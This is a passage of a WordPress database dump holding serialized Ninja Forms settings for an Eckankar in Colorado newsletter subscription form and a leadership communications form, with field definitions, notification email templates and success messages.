Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:48:\"<p>Hold CTRL key for multiple selections<br></p>\";s:10:\"multi_size\";s:1:\"4\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:27:\"Choose your subscription(s)\";s:9:\"field_key\";s:40:\"choose_your_subscription_s_1550099095640\";}s:2:\"id\";i:184;}i:7;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800483443\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"629\";}i:8;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:20:\"submit_1550094251707\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1550094251707\";}s:2:\"id\";i:186;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-02-13 13:44:28\";s:5:\"label\";s:15:\"Success Message\";s:14:\"drawerDisabled\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:599:\"<div style=\"text-align: center\">&nbsp;</div><h2 style=\"text-align: center\"><span style=\"color: #23507d; font-size: 34pt;\"><strong>Thank you for subscribing to the Eckankar in Colorado Members Newsletter!</strong></span></h2><div style=\"text-align: center; font-size: 18pt;\">&nbsp;You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\">&nbsp;</div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\">&nbsp;</div>\";s:5:\"order\";s:1:\"1\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:7:\"message\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:67;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-02-13 13:44:28\";s:5:\"label\";s:11:\"Admin Email\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"2\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:32:\"co.eck.dba@eckankar-colorado.org\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:2992:\"<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding-left: 10px; color: #23507d; line-height: 80%;\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Member Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado <span style=\"color: #23507d;\"><u>MEMBER</u></span> Newsletter\" form submission.<br></strong><br>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>MEMBER</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding: 10px; border: 1px solid #cccccc;\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333;\"><strong>FIRST NAME:</strong> </span>{field:firstname_1550094074971}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>LAST NAME:</strong> </span>{field:lastname_1550094079880}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>EMAIL:</strong> </span>{field:email_1550094081455}<span style=\"color: #333333;\"><br><strong>STATE</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:liststate_1550094094681}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>COUNTRY</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:listcountry_1550094096365}<span style=\"color: #333333;\"><br><strong>SUBSCRIPTION(S):</strong> </span>{field:choose_your_subscription_s_1550099095640}<span style=\"color: #333333;\"><strong><br></strong></span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d;\"><em>Your Eckankar in Colorado Team<br><a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><p> </p>\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";}s:2:\"id\";i:66;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-02-13 13:44:28\";s:5:\"label\";s:16:\"Store Submission\";s:14:\"drawerDisabled\";s:0:\"\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:18:\"fields-save-toggle\";s:8:\"save_all\";s:5:\"order\";s:1:\"3\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:19:\"email_1550094081455\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:65;}i:3;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-02-13 13:53:21\";s:5:\"label\";s:17:\"Send copy to user\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:27:\"{field:email_1550094081455}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:41:\"Eckankar In Colorado - MEMBERS Newsletter\";s:13:\"email_message\";s:3593:\"<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado<br></strong><b>Member</b> Newsletter Subscription<em><br></em></p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr>  <td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello  {field:firstname_1550094074971}!</strong><br><strong> Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado MEMBERS Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><b>{field:choose_your_subscription_s_1550099095640} </b><br></p><p></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table><br>\";s:14:\"drawerDisabled\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";}s:2:\"id\";i:68;}}s:8:\"settings\";a:35:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:1:\"1\";s:5:\"title\";s:30:\"MEMBER NEWSLETTER SUBSCRIPTION\";s:10:\"created_at\";s:19:\"2019-07-15 14:06:36\";s:10:\"form_title\";s:30:\"MEMBER NEWSLETTER SUBSCRIPTION\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:17:\"not_logged_in_msg\";s:0:\"\";s:13:\"sub_limit_msg\";s:42:\"The form has reached its submission limit.\";s:12:\"calculations\";a:0:{}s:10:\"conditions\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:18:\"html_1550094026658\";i:1;s:23:\"firstname_1550094074971\";i:2;s:22:\"lastname_1550094079880\";i:3;s:19:\"email_1550094081455\";i:4;s:23:\"liststate_1550094094681\";i:5;s:25:\"listcountry_1550094096365\";i:6;s:40:\"choose_your_subscription_s_1550099095640\";i:7;s:18:\"html_1663800483443\";i:8;s:20:\"submit_1550094251707\";}s:14:\"drawerDisabled\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(18,'a:7:{s:2:\"id\";i:18;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:12:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:203:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Colorado Leadership Communications</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:198:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Communications</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_68\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_68\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:187;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_69\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_69\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:188;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_70\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_70\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:189;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_71\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_71\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:190;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_72\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_72\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5: